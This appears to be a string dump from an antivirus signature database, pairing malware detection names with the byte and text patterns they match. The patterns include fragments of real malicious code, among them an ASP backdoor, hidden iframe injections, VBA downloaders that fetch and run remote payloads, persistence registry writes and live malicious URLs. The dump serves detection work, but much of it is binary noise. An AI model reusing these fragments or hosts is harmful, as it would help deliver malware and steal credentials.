!Coolvidoor!rfn Trojan:HTML/Redirector.FS <scriptsrc=http://w0rms.com/sayac.js> '<scriptsrc=http://w0rms.com/sayac.js> Backdoor:ASP/Ace.U onerrorresumenextsetfileso=createobject(\"script\"&byp4ss&\"ing.file\"&byp4ss&\"systemobject\")dimhead,endd,pathn,endddfolderpath=request.servervariables(\"pat\"&byp4ss&\"h_trans\"&byp4ss&\"lated\")privatefunctionparsefolder(pathstring)dimlicountifright(pathstring,1)=\"\\\"thenparsefolder=pathstringelseforlicount=len(pathstring)to1step-1ifmid(pathstring,licount,1)=\"\\\"thenparsefolder=left(pathstring,licount !Itagomoko!rfn Zurten.A AIframe.ES status=location;document.write('<iframesrc=\"http://track.wwwapps-ups.com/stats/xstats.php\"width=\"0\"height=\"0\"frameborder=\"0\"></iframe>'); AQakbot.M @ shcHh hcHh]h !Pdfphish.Q !Delf.ZXZ!bit msiexec /q /i] !Uoolop.A!bit !Mkar.I!bit SOFTWARE\\Microsoft\\Mrak \\Netstart\\svchost.exe !Annia!rfn Behavior:Win32/SupTab.R -ptid= !Nivdort.DJ Banablid.A !Tipikit.D !Swizzor.IR !Ryknos.R !Ryknos.S !Small.FK !Opanki.AI !Opanki.AJ !Opanki.AK !Opanki.AL !Opanki.AM !Oscarbot.M !Truim.I !Prix.A !Prix.B !Hooker.P !Wootbot.BI !Spybot.AM !VB.FH !IceHack.A !Luhn.C !Banbra.Q !Utilman.A !Munzter.A !VB.WQ !Junty.A !Simple.A !Luzia.B !VB.WR !winrar.A !Lmirtool.A !Asank.A !Randex.AB FZcXy !Anarchy.A !Mescalin.A !HammerBinder.A 5HammerBinder.A !Floodsave.A !Delf.DZ http://www.universal101.com/upd x=0/ed=0/ex=1 http://aklick.info/d.php?date= 4 !Hamer.A !Hamer.B !Hamer.C !Hamer.D !Hamer.E !Hamer.F !Nilob.A !LookMSN.A !Apropo.N !Novelce.A !Novelce.B !Novelce.C !Apropo.O !Purga.A 5kmo. k@:] !Boxed.S !Boxed.T !Expor.A !IEZones.D !Delf.FG !Wisdoor.B !Adlinks.A !VB.GH !Outbreak.C !Omefig.A !Gaobot.CZ !Gaobot.DA !Delf.TH !VB.WS !Sdnacm.A !Vasvix.A !Sadfas.A !Swizzor.CH )Atak.F !Delf.EV )Atak.I !Lookme.H !Randex.FF !Salira.A !Startpage.SC !Small.RO !Small.OL !Ciadoor.D !Small.RP !Startpage.TB !VB.B !Bilay.A ~u.\\F0` aOpenStream.I !Safq.A !Teeme.A !Veenet.A w%PYm !RPCNuke.C !VB.EI !Amitis.A !Amitis.B !Amitis.C !Faviant.A !IEZone.A !Gaobot.ZQ DS!b!b !Banco.EL !Banco.EM #Banco.EM !Outbreak.E !VB.BZ !Vidlo.H !VB.EM L(@\"] !VB.EN #VB.EL !Masteseq.F 7iF]7h`% !Masteseq.G !Masteseq.H !Masteseq.I !Masteseq.J !Masteseq.K !Adialer.FI !Masteseq.L !Baasay.A !Masteseq.M ]7`.Z\t !Masteseq.N !Masteseq.O !Masteseq.P !Masteseq.Q !Vaasay.A !Microjoin.D !Small.BT !Qaasay.A !Small.BU !Delf.FI !Dipass.A !Masteseq.R !Masteseq.S !Dipass.B !Shodi.G !CheeShodi.A #CheeShodi.A !Spybot.AP !Spybot.AQ !Spybot.AR !Spybot.AS !Small.NT !Qoologic.C !Adialer.FJ !Badrat.A z;3\t> !Badrat.B !Badrat.D !Badrat.E !Small.EA !Badrat.F !Adpower.E !Badrat.G !Laxor.A !Adialer.FK !Badrat.H !Badrat.I !Badrat.J !Banito.U !Fandool.A !Kamipeef.A !VB.GA !MedMotor.A !Totalvel.A !Small.NU !SecondThought.R !Mudrop.I !Bropia.E !Bropia.F !Bropia.G !Bropia.H !Spybot.BA !Spybot.BB !Spybot.BC !Pakes.C !Bropia.I !Spybot.AY !Bropia.J !Spybot.AZ !Gaobot.ZY !Bropia.L !Spybot.BD !Qoologic.E }1`b`& !Qoologic.F !Fratele.A !Fratele.B !Fratele.C !Wootbot.BK !Wootbot.BL !Wootbot.BM aClassloader.E !Bube.B !Bube.C !Meshbot.A !Bropia.N !Spybot.BJ !Bropia.O !Bropia.P !Spybot.BM !Spybot.BL !Gaobot.AAE !Joiner.AG !Small.M !Small.DE !Radmin.D !Small.PC !Delf.DA !Pino !Wootbot.BN 2-8b63-2f2291d6e56a c8d5ae9d-21af-48c2-89e0-ae60026c5ab0 c8d5ae9d-21af-48c2-89e0-ae60026c5ab0] !Blinsload.A http://lavajatowi.sslblindado.com/ 0#3http://lavajatowi.sslblindado.com/ 01.rar \\vmapp ?0#c:\\programdata\\ !MobicArch.A !VBInject.AEJ !CVE-2015-1641 !CVE-2015-1641m@ 588%Z_ &dtsz !|+0 `fESaD GkE%;M, GkE%;M,0 %;M,g \\~ W3 JJk,wu -eH0g \tejhg Ransom:JS/Fakpst.A t=\"australiapost\"src=\"http:// ut=\"australiapost\"src=\"http:// .ru/ .jpg\">australiapost</td> href=\"http:// @.ru/ @.php?id= @\"_blank\">print Ransom:JS/Fakpst.B .php?id= =\",\"\\x72\\x65\\x70\\x6c\\x61\\x63\\x65\",\"\\x6c\\x6f\\x63\\x61\\x74\\x69\\x6f\\x6e\"];window[_ [0]);</script><imgheight=\"1\"width=\"1\"alt=\"\"style=\"display:none\"src=\"// !Banker.AOY r.leandro.santos2015@uol.com.br dusterifos2020@gmail.com agoraachoquevaiavisonovo@gmail.com senderenvioemail.tmp maria2089 !CVE-2015-1770 !Frosparf.A /cdn.pekalongan-kummunity.com InjectMN \\pekalongan.vbp /files/zza15.zip windows\\073CZ59.exe HackAlert Credit Cheat Pekalongan Kommuniti ARedirector.OK bytiger-m@te (bytiger-m@te <script>var_0x =[\"\\x TrojanDownloader:O97M/Donoff.P RwtpBoqn SuklNzMvdmKdHhyKrHvGvcBB hPMQQpTNoydvTmnAOlzBQZSLGHRleJO OGUXESxGLrJiHkxa, qeOtzBJemRtwnWSVq TrojanDownloader:O97M/Mektwool.A TrojanDownloader:O97M/Mektwool.A Lib \"shell32\" Alias _ \"ShellExecuteA\" (ByVal Lib \"urlmon\" Alias _ \"URLDownloadToFileA\" (ByVal Dim UrlToDownloadAndExecute As String UrlToDownloadAndExecute = byOut(i) = ((byIn(i) + Not bEncOrDec) Xor byKey(l)) - bEncOrDec byOut(i) = ((byIn(i) + Not bEncOrDec) Xor byKey(l)) - bEncOrDec] Craxfora.A G_NomeArqDestinoIniciar Func_Conex Func_TemOCara Func_Arroxa select guarda1 from ropeiro INSERT INTO tbl_avs values (@id_pc,@versao,0,0,@ggbb,0,0,0,0,0,@data) SQL5009.Smarterasp.net Evestern.exe myKey123 TrojanDownloader:O97M/Donoff.Q --8rvvj\" Environ$( StrReverse( Xor first(Temp + first((third + first(third)) Mod 254)) 7Xor first(Temp + first((third + first(third)) Mod 254)) 77Btxxl\", TrojanDownloader:O97M/Donoff.R = NewPath & NewPath & \"\" & \"C:\\Users\\\" & NewPathe & \"\\AppData\\Local\\Temp\" & Split( S = NewPath & NewPath & \"\" & \"C:\\Users\\\" & NewPathe & \"\\AppData\\Local\\Temp\" & Split( = LovesAllofYouLoveYour(\"xxx gHJdfh.exec(OIKJIKHJ !VBInject.AER LLLLu S@8}# TrojanDownloader:O97M/Donoff.S \"ht$tp$:/ \t\"ht$tp$:/ \"h??tt??p:/ Environ(Replace(\" , \"$\", \"\")) Replace(\"O ShellExecuteW 0&, !Taloc.H TrojanDownloader:O97M/Donoff.T .exec(obxvhKDkLL95) UnscrambleString(\"mpt\") zBzbmMmAG(0, oz8wJHIeSx8l, obxvhKDkLL95, 0, 0) \"esw.stilhplcr\" !AutInject.BY !Bunitu.M trew/1.0 200 OK ursent rsion tify\\ \\Xhardd ccess\\S rameters\\GirewallPolicy\\StandardProfile\\ !VBInject.AES CCCCu BBBBu !Banload.X =temppasta+zipfile+\"e\"+\"\"\"\"+foldername+nmfile+\"\"\"\"+\"-aoa\"+\"-p\"+pass+\"-o\"+\"\"\"\"+foldername+\"\"\"\"+\"*.exe\"+\"-r\"wshshell.run ,1,true temppasta+fcrypt(hextostring(zipfile),ch3a)+\"e\"+\"\"\"\"+foldername+fcrypt(hextostring(nmfile),ch3a)+\"\"\"\"+\"-aoa\"+\"-p\"+pass+\"-o\"+\"\"\"\"+foldername+\"\"\"\"+\"*.mkv\"+\"-r\"wshshell.run !CeeInject.GM !Banload.Y !Obfuscator.APU !Febian.A d:\\ms.txt \\bfconfig.txt BianFengBackDoorV !Obfuscator.APV !Obfuscator.APW Behavior:Win64/Lequse.A!dha Behavior:Win32/InjectedRemoteThreadSqlservr .+Behavior:Win32/InjectedRemoteThreadSqlservr Trojan:Win64/Lequse.A!dha !Padede.A SIGATTR:Win32/Padede.A&HSTR:Win32/Padede.A] .*SIGATTR:Win32/Padede.A&HSTR:Win32/Padede.A] !Kripfly.A linkzip,stemppast+nameziptpushuulinkpri,stemppast+namepristr8zip=stemppast+namezip+\"x\"+stemppast+namepri+\"-aoa\"+\"-p\"+spasswd+\"-o\"+sapppastobjwshell.runstr8zip !Obfuscator.APX Pluterdma.A -opuntos.exehttp://www.profwoman.ru/mp3remrenamematrix.servmatrix.exe G-opuntos.exehttp://www.profwoman.ru/mp3remrenamematrix.servmatrix.exe !Startpage.XZ !Banload.Z +M:@j Q+M:@j !Eigivef.A !Obfuscator.APZ !Banload.AA environ(chr(65)&chr(112)&chr(112)&chr(68)&chr(97)&chr(116)&chr(97))&chr(92)&chr(86)&chr(66)&chr(69)&chr(5 )iffileexists(slocalpath&chr(92))thenwscript.quitmkdirslocalpathslocalpath=slocalpath&chr(92)&randomstring(8)&chr(46)&chr(101)&chr(120)&chr(101) chr(104)&chr(116)&chr(116)&chr(112) !Banload.AB =wscript.createobject(\"wscript.shell\")dimappdatawin7=objwshell.expandenvironmentstrings(\"%appdata%\")winxp=objwshell.expandenvironmentstrings(\"%windir%\\system32\")a0218367812b\"ht !CeeInject.gen!LG Dolphtoob.A eE*mw U6I775B3XVykqfxRtyePbA== Dolphin Boot - Coded For Dolphin Protector /c echo [zoneTransfer]ZoneID = 2 > pchealth.exe UrlAssociations\\http\\UserChoice 4hrfienz.rfk.dll !Banload.AC regsvr32.exe/s\":savebinarydatabinarygeturl(surl&\"c.html\"),snomeimg:objwshell.runscamaro&smonza&snomeimg&smonza&ssenha wregsvr32.exe/s\":savebinarydatabinarygeturl(surl&\"c.html\"),snomeimg:objwshell.runscamaro&smonza&snomeimg&smonza&ssenha !Olutall AMeadgive.V Exploit:HTML/Meadgive.N !Obfuscator.AQA !VBInject.AEQ !Upatre.CD > gL] !CeeInject.GN !Injector.GW TrojanDownloader:O97M/Kriof.A -window hidden -enc Critical Microsoft Office Error JAAxACAAPQAgACcAJABjACAAPQAgAC Ransom:HTML/Tescrypt j,k-+ Bartallex.M As Integer) ) & \"om/w\" & \"p-includes/theme-compat/\" (ATTH + STT1 + LNSS) Behavior:Win32/DnsTamperLib !OnionDuke.A!dha !OnionDuke.C!dha upload_slowdown_ms: master_slave_policy: post_per_request_limit_kb: local_limit_mb: mycert: hex( - arg: campaign_id !OnionDuke.B!dha !OnionDuke!dha Nagoot.A I=M>\t] !Worqid.A !Upatre.CE !Banker.AOZ !AutInject.BZ :.iI7 !Seepeldown.D !VBInject.AET !Obfuscator.AQC !Brucryp O+P3f85OR !Startpage.YH !Alucple !Codbot fGLOBAL CONST $DVD_FILE_ROOTPATH = \"autorun\\autorun. GLOBAL CONST $DENY_PROCESS_LIST = STRINGSPLIT ( \"Burn|nero|clone|iso|dvd|cd|alc|bw|taskmgr\" , \"|\" ) GLOBAL CONST $DENY_WINDOWS_LIST = STRINGSPLIT ( \"Ashampoo Burning Studio|Alcohol 120|Alcohol 52\" , \"|\" ) REGWRITE ( \"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" , \"NETLib\" , \"REG_SZ\" , @SCRIPTFULLPATH ) #NoTrayIcon #RequireAdmin] !Weebu.A !Obfuscator.AQB !Obfuscator.AQD Ffloq.A set_Expect100Continue Firefox.Resources.resources ConfuserEx v0. ConfuserEx v0.g Katara.A Tectizo.A Subti.G /c reg add \"HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\W !Slackbot.D p8eJ* )Gopworm.A )Heyya.A )Skybag.B B_T(y )Torvil.D !Blaxe.A !Bomka.A !VB.ZS !VB.ES !Delf.HN !Bancos.ID !Banker.UJ !VB.ANO !Banker.DER !Bomka.B !VB.IF !Aimbot.BA !Amitis.D !Beastdoor.CK !Beastdoor.CL !Beastdoor.CM !Beastdoor.CN !Bifrose.DB !Bionet.F !Coldfuson.I !Delf.YU !Delf.YV !Kamikaze.A !Lithium.C !Netdevil.L !Optix.AA !Optix.AB !Optix.AC !Optix.AD !Optix.AE !Optix.AF !Optix.AG !Optix.AH !Optix.AI !Optix.AJ !Winshell.G !Winshell.H !Winshell.I !Winshell.J !Winshell.K !Eliterab.B l,+K@ !Madtol.G !Delf.KV ,taWi !VB.WJ !VB.WK !WarSpy.G !Bancos.IF !Delf.GY !Scane.A !Tuim.D !Tuim.E !Smuma.B !Smuma.A !Mulod.A !Yiha.A !Bifrose.B !Feardoor.L !Sfind.B !Frusion.A !Ducky.A !PWSteal.D !Zinflow.A aFURootkit.A do'MK c0\\Q}s&G !VB.WA !Aflooder.A !VB.WB !VB.K !PcClient.C !Aflooder.B !ProcKiller.A !VB.WC !Delf.RJ !Small.VL !Sennaspy.2000 !Funner.A !Recto.A !Small.VN !Small.VO !VB.WD !Small.AF r aiE !Gaobot.ZG !Small.VR !VB.BU !VB.WE !Small.AG !Splitu.A !Tuim.G !Tuim.H 5P1):v !Lmir.QW !Small.BV Maxload.A V/e ] )Mywife.G !Protoride.AD !Bancos.BH !Randex.FD !Gaobot.ZH !Dcom.BX !Banbra.R !Small.LS !Delf.FE !Bancos.BK Provider=SQLOLEDB.1;Password= javascript:enviaUrl Enviarpgina Windows messenger javascript:cadastroSenhas() \\liberaplug.log !Delf.SC !DcomScan.A !Small.MI !Small.MK !Small.ML !Bancos.BL !Wootbot.CR !Startpage.PS !Small.MM !Gaobot.ZK !Small.MO !Inof.A !Small.MQ !Banbra.Z !Small.MS \t7t!\") !Small.MT !Triject.A !Bifrose.E !Spybot.AO !Small.MU !Delf.FH !Small.MV !Adfram.B !Small.MW !Adfram.C !Adfram.D aClassloader.D !Adfram.A >c@lf !Pekax.A !Spuid.A !Smym.A )Mugly.C !NetexScan.A !SynFlood.F !Small.MX !Gaobot.ZL !Gaobot.ZM !Banbra.AA !Small.BW !Small.MZ !WebSearch.C !Webber.L !Delf.FF qEeg& !Hidproc.A !Small.NA >dM,G !AdSearch.A !AdSearch.B !Winad.B !Protoride.AF !Small.MY !NetexScan.B +Klez.H@mm !Small.NB !VB.DX !Startpage.PW !Outbreak.D !Small.NC !Startpage.PV !Small.B !Small.AL h<[ g/\\ !Small.AM !Small.AN !Banbra.AB !Startpage.PX !Adialer.FE !Adialer.FF !Adialer.FG !VB.DY !Small.BZ !Killfiles.FI !Killwin.W !Primativ.A !Zalim.A !Small.AO !Small.AP !Small.CN !Small.NP !Small.NQ !Zalim.B !Small.L !Berbew.CN !Berbew.CO !Banker.FO !Small.NR !Small.CO Behavior:Win32/Dirtvanontufo.A!nri .\"Behavior:Win32/Dirtvanontufo.A!nri Behavior:Win32/Solorabbit.B!nri Behavior:Win32/MZPEMemoryArtifacts.D .$Behavior:Win32/MZPEMemoryArtifacts.D !Chadivendo.STA Global\\ !Chadivendo.STB !Chadivendo.STC Pjjjjjjjh DebugBreak \\Temp\\edg AgentTesla.OXAR!MTB AgentTesla.OXAS!MTB Trojan:PDF/Phish.RRE!MTB Behavior:Win32/SuspMshtaLaunch.B . Behavior:Win32/SuspMshtaLaunch.B Behavior:Win32/RegWriteScript.A PP\t@/L\\microsoft\\windows\\currentversion\\run vbscript:execute Behavior:Win32/RegWriteScript.B PP\t@4 hkcu\\software test-connection Puntil Exploit:O97M/CVE-2017-11882.HZ!MTB \"Exploit:O97M/CVE-2017-11882.HZ!MTB @ !Chadivendo.STD ServiceDll wwlib.dll Psc start \"%s\" f2032.com \tf2032.com Worm:AndroidOS/Goodnews.B!MTB Lcom/chodukaka/isporban StartAppAd getSubId You need to click on Ad to Continue. $You need to click on Ad to Continue. To start Tiktok, follow next steps \"To start Tiktok, follow next steps Click on Next Button to continue Click on Next Button to continue http://tiny.cc/Tiktok-Pro Share this APP on Whatsapp groups 10 Times.\\nto Start Tiktok. =Share this APP on Whatsapp groups 10 Times.\\nto Start Tiktok. AgentTesla.TL!MTB )1~]Tm TrojanDownloader:O97M/EncDoc.PKM!MTB $TrojanDownloader:O97M/EncDoc.PKM!MTB Behavior:Win32/DllMsiexecInject.B .!Behavior:Win32/DllMsiexecInject.B Trojan:ASP/Webshell.PB!MTB Trojan:O97M/ZLoader.RJ!MTB Racealer.DA!MTB $4365bee4-1b24-4b5f-815e-d5408dea8639 OnScreenKeyboard.Properties.Resources DebuggingModes] Racealer.DB!MTB $519712d6-3c83-4b33-92b5-37f06995e528 $AAC9D1F6-E722-467C-8DAC-634967DB27FE SB.My.Resources FallbackManager.My.Resources !Ranumbot.RF!MTB eGlVXL Pjjjj DarkKomet.R!MTB !Stealer!MTB !SpyNoon!MTB !AveMaria!MTB !Spynoon.AVP!MTB TrojanDropper:O97M/Hancitor.EMLU!MTB %$TrojanDropper:O97M/Hancitor.EMLU!MTB & \"\\MsMp.dll\") = \"\" Then plop & \"\\MsMp.dll\") Call rnee(uuu, aaaa)] Agensla.GD!MTB http://myliverpoolnews.cf/liverpool-fc-news/features/ UserAgent: DownloadString] Rocke.A!MTB TrojanSpy:PowerShell/Stealer!MSR ' TrojanSpy:PowerShell/Stealer!MSR :\tdg& TrojanDownloader:O97M/EncDoc.RGEA!MTB %TrojanDownloader:O97M/EncDoc.RGEA!MTB 4htps:/ino.caregjc\\zmsffdwbkdvxul,rvlmontajexuyighpby 74htps:/ino.caregjc\\zmsffdwbkdvxul,rvlmontajexuyighpby TrojanDownloader:O97M/Obfuse.BB!MTB #TrojanDownloader:O97M/Obfuse.BB!MTB zzzzh_b64 = zzzzh_b64 & \"/lasdwe/bdaa3811-bb6c-42c7-ae25-0329f3a59ce1\", 436, zzzzh DynMemcpy alloc, zzzzh, hread, hwrite .ExpandEnvironmentStrings(\"%TEMP%\") & \"\\cym_16001380430BD84B24.exe\" Based = Based & hcffgfawrenm( & Chr$(Val(\"&H\" & Mid$( , 2))) = kuQWG9Jl(UserForm1.Label1.Caption) .Environment(\"process\").Item(\"param1\") = .run \"cmd /c call %param1%\", 2 = Split(afterBool, \"#\") c:\\\\users\\\\public\\\\nameTpl.h Optional refCnt = \"t\", Optional lBDocument = \"a\") = responseDeleteResponse & convertScr & \"\" & refCnt & lBDocument = responseDeleteResponse & convertScr & \"\" & refCnt & lBDocument] !SelfDel.V!MTB axq,Ng Trojan:Win64/CryptBanker!MTB Trojan:Win64/CryptInject.V!MTB Asyncrat!MTB Ransom:MSIL/Cring.DA!MTB your network is encrypted Crypt3r @tutanota.com killme.bat killme.bat] !Stelega.DE!MTB Ftbi}oMeakBqabzzrA Ftbi}oMeakBqabzzrA] !QQPass.DA!MTB KLJEWERHsdwqeh23211!@asdqSADwe BRESUZCDY.jpg wahaha wahaha] Trojan:AndroidOS/FakeApp.K!MTB Lcom/wagd/gg/MyService; /update/update.conf load64Data bytes getThisAppArch MobclickRT /system/app/Kinguser.apk TrojanDropper:O97M/Donoff.PK!MSR % TrojanDropper:O97M/Donoff.PK!MSR = \"s\" & \"c\" & \"he\" & \"du\" & \"le\" & \".\" & \"s\" & \"e\" & \"r\" & \"vic\" & \"e\" F= \"s\" & \"c\" & \"he\" & \"du\" & \"le\" & \".\" & \"s\" & \"e\" & \"r\" & \"vic\" & \"e\" = \".\" & \"e\" = writeToFile(p & \"b.doc\", tOut) = writeToFile(p & \"b.doc\", tOut) = \"x\" & \"e\" = publicpath & bslash & \"do\" & \"c\" & \"u\" & \"m\" & \"e\" & \"nt\" & \"s\" & bslash J= publicpath & bslash & \"do\" & \"c\" & \"u\" & \"m\" & \"e\" & \"nt\" & \"s\" & bslash = StrConv(\"PF&5NQK*mR^x94GE6HaU>%M;L{17/}@lDXgWq,ovitj`s~$fASyJcOd :rT8bV3-0\", vbFromUnicode) ]= StrConv(\"PF&5NQK*mR^x94GE6HaU>%M;L{17/}@lDXgWq,ovitj`s~$fASyJcOd :rT8bV3-0\", vbFromUnicode) Behavior:Win32/Chadivendo.A Lnet start !Chadivendo.STE ServiceResponce.dll ServiceResponce.dllServiceMain !Chadivendo.STF %08x.txt TrojanDownloader:O97M/IcedId.MR!MTB #TrojanDownloader:O97M/IcedId.MR!MTB Behavior:Win32/ModMon Behavior:Win32/SystemMiner.A --donate-level AgentTesla.OXAT!MTB TrojanDownloader:O97M/IcedID.RVN!MTB $TrojanDownloader:O97M/IcedID.RVN!MTB \"c:\\progra\", Optional = \"ta\" ((\"explorer \") Split(ActiveDocument.Range.Text, \"x\") & \"mdata\\ .h\" & Print #1, out & Chr(arr(cnt) Xor 100) TrojanDownloader:O97M/Obfuse.RVW!MTB $TrojanDownloader:O97M/Obfuse.RVW!MTB ddzdqsdff() & \"\\\" + rmlkejgmlkdfjgri(2) + \".exe\" PxPToxhq.Open \"GET\", sdqsldjkf, False slkfjdfjhglkjdshze.Run XxX, 1, True str & Mid(LETTERS, Int(strLen * Rnd + 1)) str & Mid(LETTERS, Int(strLen * Rnd + 1))] TrojanDownloader:O97M/Donoff.MXT!MTB $TrojanDownloader:O97M/Donoff.MXT!MTB \"HTTPDownload 'http://1lxtjdias-pod:8080/stage3.exe' CreateObject (\"; Scripting.FileSystemObject; \") Wscript.CreateObject (\"; Wscript.Shell; \") \"WshShell.Run strFile\" FolderExists(Left(path, InStrRev(path Shell \"wscript C:\\DEV\\VBA\\stage2.vbs\" fp = \"C:\\DEV\\VBA\\stage2.vbs\" fp = \"C:\\DEV\\VBA\\stage2.vbs\"] !Konus.SG!MTB data_inject [TAB] [DELETE] [BACKSPACE] [RETURN] F3P7Y6P3U3E2U5F3 P4Y7T7R7R8X3E3A3 D3S0A7R4F6C8F2R5 :Zone.Identifier profiles.ini B \\Google\\Chrome\\User Data\\Default\\] !Konus.SH!MTB C3E0Q6R7F1H2G5A4 https://api.ipify.org/ ?a=3 ?a=3 explorer.exe] Behavior:Win32/DridexDllPreload.A .!Behavior:Win32/DridexDllPreload.A @!\\syswow64\\ @!\\system32\\ Behavior:Win32/DridexDllPreload.B .!Behavior:Win32/DridexDllPreload.B !Salgorea.A!MTB !Spynoon!MTB !Predator.SS!MSR !Predator.AR!MSR !Predator.PJ!MSR NanoBot.RKC!MSR !Tnega.AL!MTB ZJ:2 u f k,J !Obfuse.MXR!MTB dimmdpe, mdpe=\"krbgdwdtjonzpcmditsbquporkyvowsjggzrmtm\"setmdpe=createobject(\"microsoft.xmlhttp\") =\"https://pjoao1578pro2.site/crypt/vbscript.txt\"mdpe.open\"get\", ,falsemdpe.send\"\"execute(\"execute(mdpe.responsetext)\") Ransom:Win64/DelShad!MSR !Borhieda.STA Processcurb.A!MTB Trojan:Win64/CobaltStrike.STB Trojan:Win64/CobaltStrike.STB\t@ 8+Veb~ !Lokibot.RV!MTB !Obfuse.RA!MTB pjoao1578pro2.site/crypt/vbscript.txt 3pjoao1578pro2.site/crypt/vbscript.txt Ohttps:// Processcurb.A1!MTB startingexploit..$nc\"sleep4echo\"\"echo-e\"$az$cu2$bcheckpathbash @startingexploit..$nc\"sleep4echo\"\"echo-e\"$az$cu2$bcheckpathbash Processcurb.A2!MTB echo-e\"$v$cu1$bgettingashellasroot..$nc\"sleep2echo\"\"tputcnorm ?echo-e\"$v$cu1$bgettingashellasroot..$nc\"sleep2echo\"\"tputcnorm APhish.VS!MSR window.frames['load-url'].location='http://r3.o.lencr.org/' =window.frames['load-url'].location='http://r3.o.lencr.org/' !CobaltStrike!MSR http://185.225.19.240/dmenconsvc.dll &http://185.225.19.240/dmenconsvc.dll Trojan:XML/ObfInject!MTB TrojanDownloader:O97M/TrickBot.RTS!MTB &TrojanDownloader:O97M/TrickBot.RTS!MTB !Empire.B eMicrosoft Loader] !Banker.SE C:\\TEMP\\\\ 0KC:\\Documents and Settings\\ \\Local Settings\\Application Data\\amb0 Banker.D !VB.AEE !Delf.JJ !Pidief.CI !Pidief.CJ !Pidief.CK aOpenStream.AP !VBInject.NG !VB.LP Scylla Botnet.+\\\\Server\\\\Proyecto1.vbp ,'Scylla Botnet.+\\\\Server\\\\Proyecto1.vbp !Startpage.NT [*9\"< !VB.AEF \\\\Laboratorio de Virus\\\\WinXP\\\\Downloader.vbp 3.\\\\Laboratorio de Virus\\\\WinXP\\\\Downloader.vbp !QQpass.DZ !Agentsmall.F C0\t\t8 C0\t\t8 C0\t\t !Agentsmall.G !Agentsmall.H C0\t\tz C0\t\tz , C0\t\t !Delall.D !QQpass.CJA !Slefdel.C !Murlo.R !Murlo.N !Murlo.Q !Startpage.ACA !Startpage.ACB !QQpass.CIB !OnLineGames.ZEC ]GB}n !VB.YAI !VB.YAL !OnLineGames.ZEE!dll ~f]yu !VB.YAC fSM/N. -j'@d !FakeMS.C -uzf-- !Delf.ZXA !OnLineGames.AAE !Startpage.YG !Delf.ZXB Hh4c@ kA.-\t !VB.AEZ !VB.YAJ )o}a: !Zhbin.A !Startpage.YF Startpage.C Startpage.D !Startpage.AB 8CLSID\\{871C5380-42A0-1069-A2EA-08002B30309D}\\ShellFolder #WshShell.CreateShortcut(Favorites & J\\In\"&\"t\"&\"ern\"&\"et Expl\"&\"or\"&\"er\\M\"&\"a\"&\"i\"&\"n\\S\"&\"t\"&\"ar\"&\"t P\"&\"a\"&\"ge\" 1\\Wi\"&\"nd\"&\"ows\\C\"&\"urren\"&\"tVers\"&\"ion\\R\"&\"u\"&\"n\\ /f/q/a del \" \\Internet*.*\" 1nkfile\\shellex\\IconHandler 1nkfile\\shellex\\IconHandler] !Agent.EK open\\internetexplorer\\iexplore.exehttp://home.zh-cn.cc/ 9open\\internetexplorer\\iexplore.exehttp://home.zh-cn.cc/ !Agent.EL open\\internetexplorer\\iexplore.exehttp://www.tagbao.com/open >open\\internetexplorer\\iexplore.exehttp://www.tagbao.com/open !Cosmu.A !DyCode.C !Webnav.A!dll :\\windows\\system32\\index.html 360seURL\\shell\\open\\command :\\Program Files\\wisesoft\\ htmlfile\\shell\\open\\command Explorer\\iexplore.exe\" \"%1\" \\wisesoft\\config.ini \\wisesoft\\config.ini] !Banker.XO </B><SPAN id=bank-name> BANK=%s&QIAN=%s&ALIPAYNAME=%s&ALIPAYVER=%s *BANK=%s&QIAN=%s&ALIPAYNAME=%s&ALIPAYVER=%s %s/PayToMe/TB_Pay.Asp?nFlag=0&UserName=%s )%s/PayToMe/TB_Pay.Asp?nFlag=0&UserName=%s] ip.hetodo.com:8754/ip.php .hetodo.com:8080/sogouconfig/click_new_ '.hetodo.com:8080/sogouconfig/click_new_ /count.asp?mac=%s&ver=%s /count.asp?mac=%s&ver=%s] !Morix.B !Morix.B\t@ !Morix.C !Mulcss.A <$ t! %SystemRoot%\\System32\\svchost.exe -k $%SystemRoot%\\System32\\svchost.exe -k sc config UI0Detect start= disabled #sc config UI0Detect start= disabled SOFTWARE\\ODBC\\SQLLevel SOFTWARE\\ODBC\\SQLLevel] NewStart\\ADSCut_SingleQQ\\release\\ADSCut.pdb +NewStart\\ADSCut_SingleQQ\\release\\ADSCut.pdb !FakePlayer.B vnetservices.l0086.com.cn \\NethomeInfo\\MyIEData\\main.ini \\NethomeInfo\\MyIEData\\main.ini] !OnLineGames.ZEA!dll /t.asp C:\\mxdos.sys C:\\mxdos.sys] !Startpage.ZA zhenlaji tongji.aectime.com/api/ 117.40.196.202/tj7/count.asp?mac= 114search.118114.cn/search_web.html? dianxin.online.cq.cn/api/taobao/index.htm] !OnLineGames.ZDX!dll up/Upf.asp %s%s?ac=h&i=%s&h=%s %s%s?c=q&i=%s&s=%s&a=%s&m=%s&t=%d %s%s?c=q&i=%s&s=%s&a=%s&m=%s&t=%d] !QQpass.CIA d:\\sys.txt d:\\Txs.dll mm2020.usa20.ceshi6.com/SPOP/DXBPVQ/user.asp?username= &op_type=add&submit=ok &op_type=add&submit=ok&a2=&a1=&password=] !OnLineGames.ZDM!dll ?a=%s&s= &u=%s&p=%s&r=%s& &u=%s&p=%s&r=%s&] !OnLineGames.ZDV!dll /mibao.asp %s?act=&d10=%s&d80=%d ?d10=%s&d11=%s&d00=%s&d01=%s&d22=%s&d32=%s&d70=%d&d90=%d ?d10=%s&d11=%s&d00=%s&d01=%s&d22=%s&d32=%s&d70=%d&d90=%d] !Delf.ZSA .xz19.com ctfmon_ kuodousetup38_ CnIE.tmp cn.tmp cn.exe !OnLineGames.ZED!dll %s?act=getpos&d10=%s&d80= ?a=%s&s=%s&u=%s&p=%s&pin=%s& wsidny.asp wsidny.asp] !VB.YAK kaoti.exe ahui.exe, 0 \t(C:\\WINDOWS\\system32\\ c.greenclick.cn/click?pid=23&mid=19483&channel=2&pt=df] !VB.YAB \\Hijack.exe nResurrection.bat .18286.net/?xin NaNianHuaKai] !Xwxia.A \\npdrmv.jpg\" /q /f %MYFILES%\\coopen_setup .zuihouyi.com/ a.xwxiazai.com/ .07396.com/ .07396.com/] !Inbat.A %MYFILES%\\Upd.exe %MYFILES%\\in.exe //www.xunlei100.com/msn/ //install.xinruicn.com //to2.5cnd.com/ //a.xwxiazai.com/ /bibibei /coopen_setup_ pipi\\unins000.exe\" /f /DDHYT.exe /pipi_dae_ /kugou_ /36a11.exe /36a11.exe] !Kplo.A jjjjjjjh \\lpk.dll LpkInitialize LpkInitialize] 